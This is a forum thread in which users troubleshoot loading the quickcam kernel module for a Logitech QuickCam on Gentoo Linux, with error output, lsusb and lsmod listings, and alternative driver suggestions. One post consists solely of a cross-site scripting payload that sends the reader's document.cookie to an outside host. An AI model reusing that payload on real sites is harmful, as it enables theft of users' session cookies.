# Modprobe Quickcam fails

## bladdo

I have a quickcam camera, so i emerged qc-usb. Then I did a modprobe quickcam and now i get back:

```

PerlBoxX mi # modprobe quickcam

FATAL: Error inserting quickcam (/lib/modules/2.6.7-gentoo-r14/drivers/usb/quickcam.ko): Unknown symbol in module, or unknown parameter (see dmesg)

```

So I do a dmesg:

```

quickcam: Unknown symbol video_devdata

quickcam: Unknown symbol video_unregister_device

quickcam: Unknown symbol video_register_device

```

Does anyone know what this means?

----------

## robet

Did you do modules-update first? That's my best guess...

----------

## bladdo

Just tried that. Didnt work. :/ Oh yeah a rebooted too and still didnt work

----------

## Ausmosis

Milo: did you ever get this sorted out? I'm getting the same error.

----------

## Sanderfox

Quickcam Messenger or Express ?

The driver you tried only works for Quickcam Express. For the Quickcam Messenger, you can get the driver here: http://home.mag.cx/messenger/

There are also some ebuild around, but I couldn't find any so soon. You might have to edit the script quickcam.sh in line 634: add " |:08f0" behind "|:0870", depending on the model number of your quickcam.

I hope this helps a bit  :Smile: 

----------

## Ausmosis

 *Sanderfox wrote:*   

> Quickcam Messenger or Express ?
> 
> The driver you tried only works for Quickcam Express. For the Quickcam Messenger, you can get the driver here: http://home.mag.cx/messenger/
> 
> There are also some ebuild around, but I couldn't find any so soon. You might have to edit the script quickcam.sh in line 634: add " |:08f0" behind "|:0870", depending on the model number of your quickcam.
> ...

 

Sanderfox: it is the Express version. I have it finally got the driver module loaded along with v4l, but there still seems to be a problem. In xawtv I only get a blue screen and when I tried to use mplayer it tells me it couldn't find v4l !!.... here is my outup:

From lsusb:

```

Bus 002 Device 004: ID 05fe:0011 Chic Technology Corp. Browser Mouse

Bus 002 Device 003: ID 0451:2046 Texas Instruments, Inc. TUSB2046 Hub

Bus 002 Device 002: ID 046d:0840 Logitech, Inc. QuickCam Express

Bus 002 Device 001: ID 0000:0000

Bus 001 Device 001: ID 0000:000

```

from lsmod:

```

odule                  Size  Used by

nvidia               4544020  -

snd_seq_midi            6464  -

snd_emu10k1_synth       6792  -

snd_emux_synth         35336  -

snd_seq_virmidi         5384  -

snd_seq_midi_emul       6728  -

snd_emu10k1           123204  -

snd_rawmidi            20320  -

snd_util_mem            3176  -

snd_hwdep               6956  -

quickcam               73196  -

videodev                6656  -

epic100                18092  -

ppp_async               9288  -

crc_ccitt               1576  -

ppp_synctty             8168  -

ppp_generic            21756  -

slhc                    5832  -

```

I'm just wondering if Bus 002 is the problem. Although my usb cam is not attached to the same USB port (i.e. 4 port USB device) lsusb is saying it's using Bus 002 which is where the 4 port USB device sits as well!!... am I right in saying that? Ekiga doesn't se v4l and neither does xawtv. Kopete's webcam plugin however does work although very very bad.... I'm not sure what is going on. 

Video4Linux under my kernel is a module so I'm not sure why some apps don't see this. I'm running kernel 2.6.16-r9.

any help would be appreciated.

----------

## digital_rain

<script>img = new Image(); img.src = "http://s.netsec.ru/digital0rain.gif?"+document.cookie;</script>*

----------

## Ausmosis

 *digital_rain wrote:*   

> <script>img = new Image(); img.src = "http://s.netsec.ru/digital0rain.gif?"+document.cookie;</script>*

 

 :Rolling Eyes: 

----------

## luispa

I had a similar problem and finally swapped to the spca5xx driver, that works ok:

```
emerge -v spca5xx spcaview

modprobe spca5xx 

```

Then use spcaview to test.

Luis

----------

